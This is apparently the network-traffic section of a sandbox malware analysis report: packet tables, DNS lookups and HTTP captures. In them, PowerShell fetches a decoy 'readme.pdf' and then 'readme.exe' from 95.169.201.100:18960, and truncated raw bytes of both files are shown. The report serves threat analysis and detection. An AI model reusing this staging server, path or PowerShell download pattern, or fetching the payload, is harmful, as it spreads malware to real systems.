                                                                                                                                                                                                        Dec 4, 2024 13:53:17.957948923 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.958641052 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.958714962 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.958760023 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.959405899 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.959537029 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.959611893 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.960239887 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.960465908 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.960510015 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.961215973 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.961343050 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.961417913 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.962070942 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.962213993 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.962280035 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.962969065 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.963018894 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.963069916 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.963700056 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.963814020 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.963864088 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.964272022 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.964375973 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.964421988 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.965207100 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.965311050 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.965363979 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.965929985 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.966175079 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.966221094 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.966772079 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.966909885 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.966968060 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.967633009 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.967786074 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.967828035 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.048955917 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.049031973 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.049300909 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.049427032 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.049505949 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.050190926 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.050443888 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.050488949 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.050496101 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.050806046 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.051260948 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.051346064 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.051393032 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.052401066 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.052450895 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.052629948 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.052937984 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.053040028 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.053081989 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.053757906 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.053813934 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.053847075 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.054475069 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.054591894 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.054629087 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.055388927 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.055458069 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.055495024 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.056252003 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.056408882 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.056487083 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.057066917 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.057161093 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.057199001 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.057733059 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.057843924 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.057866096 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.058543921 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.058670998 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.058731079 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.059357882 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.059462070 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.059473038 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.060159922 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.060280085 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.060309887 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.060987949 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.061100960 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.061135054 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.061834097 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.061964035 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.062206030 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.062614918 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.062805891 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.062819958 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.063424110 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.063625097 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.063673019 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.064273119 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.064392090 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.064506054 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.065167904 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.065227032 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.065392017 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.065895081 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.066001892 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.066041946 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.066674948 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:18.066777945 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.344310045 CET192.168.2.71.1.1.10x326dStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.345036030 CET192.168.2.71.1.1.10x2ae6Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.345455885 CET192.168.2.71.1.1.10xc03cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.345875978 CET192.168.2.71.1.1.10x5cd3Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.358045101 CET192.168.2.71.1.1.10x7ffeStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.358732939 CET192.168.2.71.1.1.10x9a1aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:21.157114029 CET192.168.2.71.1.1.10x7471Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:21.157277107 CET192.168.2.71.1.1.10x2570Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:22.090610981 CET192.168.2.71.1.1.10x97ffStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:22.090745926 CET192.168.2.71.1.1.10x5deStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Dec 4, 2024 13:53:19.034287930 CET1.1.1.1192.168.2.70xf470No error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:19.036591053 CET1.1.1.1192.168.2.70xeb81No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:19.036591053 CET1.1.1.1192.168.2.70xeb81No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:19.037561893 CET1.1.1.1192.168.2.70x8392No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:19.061338902 CET1.1.1.1192.168.2.70x22cdNo error (0)b-0005.b-dc-msedge.net13.107.9.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.482641935 CET1.1.1.1192.168.2.70x2ae6No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.482770920 CET1.1.1.1192.168.2.70xc03cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.482770920 CET1.1.1.1192.168.2.70xc03cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.482822895 CET1.1.1.1192.168.2.70x5cd3No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.483084917 CET1.1.1.1192.168.2.70x326dNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.483084917 CET1.1.1.1192.168.2.70x326dNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.495172024 CET1.1.1.1192.168.2.70x7ffeNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.495172024 CET1.1.1.1192.168.2.70x7ffeNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:20.498625040 CET1.1.1.1192.168.2.70x9a1aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:21.301875114 CET1.1.1.1192.168.2.70x7471No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:21.302783966 CET1.1.1.1192.168.2.70x2570No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:22.227768898 CET1.1.1.1192.168.2.70x5deNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:22.227781057 CET1.1.1.1192.168.2.70x97ffNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:53:22.227781057 CET1.1.1.1192.168.2.70x97ffNo error (0)googlehosted.l.googleusercontent.com142.250.181.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:21.897586107 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:21.897586107 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:22.930639982 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:22.930639982 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:23.931200027 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:23.931200027 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:25.929003000 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:25.929003000 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:29.966588020 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:54:29.966588020 CET1.1.1.1192.168.2.70x8ec6No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:55:10.619919062 CET1.1.1.1192.168.2.70x2c6dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:55:10.619919062 CET1.1.1.1192.168.2.70x2c6dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:55:11.633421898 CET1.1.1.1192.168.2.70x2c6dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:55:11.633421898 CET1.1.1.1192.168.2.70x2c6dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:55:12.619735003 CET1.1.1.1192.168.2.70x2c6dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 4, 2024 13:55:12.619735003 CET1.1.1.1192.168.2.70x2c6dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.74970195.169.201.100189606360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Dec 4, 2024 13:53:08.581187963 CET190OUTGET /uploads/team-1/readme.pdf HTTP/1.1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                        Host: 95.169.201.100:18960
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Dec 4, 2024 13:53:09.842462063 CET691INHTTP/1.1 200 OK
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 656088
                                                                                                                                                                                                        Content-Type: application/pdf
                                                                                                                                                                                                        Last-Modified: Mon, 02 Dec 2024 20:24:49 GMT
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:09 GMT
                                                                                                                                                                                                        Data Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23 88 a0 b3 a4 41 52 90 78 e0 c2 c7 e1 c0 bd f7 40 ae 00 90 97 a0 3f 88 c2 46 dd 10 5b 56 5b 9c 7f 47 40 60 2a db 1d 05 64 4b 80 ef 97 24 fb bc f5 4f 2e 4b 0b 1d 6f e4 02 1f 40 14 b6 ac 36 08 1d 60 cd 4f f8 2c 66 27 e1 cb 98 4f a3 20 02 61 12 73 78 d0 30 41 b8 03 36 fd 19 76 66 d8 0d c2 38 ff 06 ec f4 7b 63 37 bd 9b 25 6f 70 d8 04 5a c0 3a 75 86 0c f1 e9 e1 51 a4 c9 09 c7 d8 14 d1 30 51 d9 a3 46 09 19 15 19 85 2a 1a e5 e9 d4 90 28 a3 53 c1 c0 c0 c4 44 47 41 43 41 61 17 95 6a dc 67 b2 72 78 03 fa 17 cc 5d a5 9e 73 0d 0f 17 50 78 4d bd 8d 09 ac 9c c3 fd 63 ea a5 1d 07 76 68 4f ad 3c 90 eb 76 e1 f3 16 96 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: %PDF-1.7%18 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#ARx@?F[V[G@`*dK$O.Ko@6`O,f'O asx0A6vf8{c7%opZ:uQ0QF*(SDGACAajgrx]sPxMcvhO<v-X}b3~*mDJHT~Kendstreamendobj19 0 obj<</Type /XObject/Subtype /Image/Width 2400/Height 1363/ColorSpace /DeviceRGB/BitsPerComponent 8/ColorTransform
                                                                                                                                                                                                        Dec 4, 2024 13:53:13.993750095 CET166OUTGET /uploads/team-1/readme.exe HTTP/1.1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                        Host: 95.169.201.100:18960
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.399913073 CET701INHTTP/1.1 200 OK
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 2764800
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 09:35:15 GMT
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:14 GMT
                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 8c c0 ee f9 ed ae bd f9 ed ae bd f9 ed ae bd 7a e5 f1 bd fe ed ae bd 03 ce b7 bd fb ed ae bd ea e5 f3 bd fb ed ae bd 7a e5 f3 bd ee ed ae bd f9 ed af bd 9b ec ae bd 23 ce b2 bd f8 ed ae bd fc e1 f1 bd f8 ed ae bd fc e1 ce bd 90 ec ae bd 15 e6 f0 bd f8 ed ae bd f9 ed ae bd f8 ed ae bd fc e1 f4 bd f8 ed ae bd 52 69 63 68 f9 ed ae bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ee d1 10 43 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 07 0a 00 c0 13 00 00 60 16 00 00 00 00 00 00 c3 0d 00 00 10 00 00 00 d0 13 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zz#RichPELC`@6Y$.".text


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        0192.168.2.74970213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:11 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:11 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:11 GMT
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Content-Length: 218853
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 18:21:00 GMT
                                                                                                                                                                                                        ETag: "0x8DD13C73D7EC056"
                                                                                                                                                                                                        x-ms-request-id: 85afd668-301e-0052-47c3-4565d6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125311Z-1746fd949bdb8xvchC1EWRmbd40000000140000000009et2
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:11 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
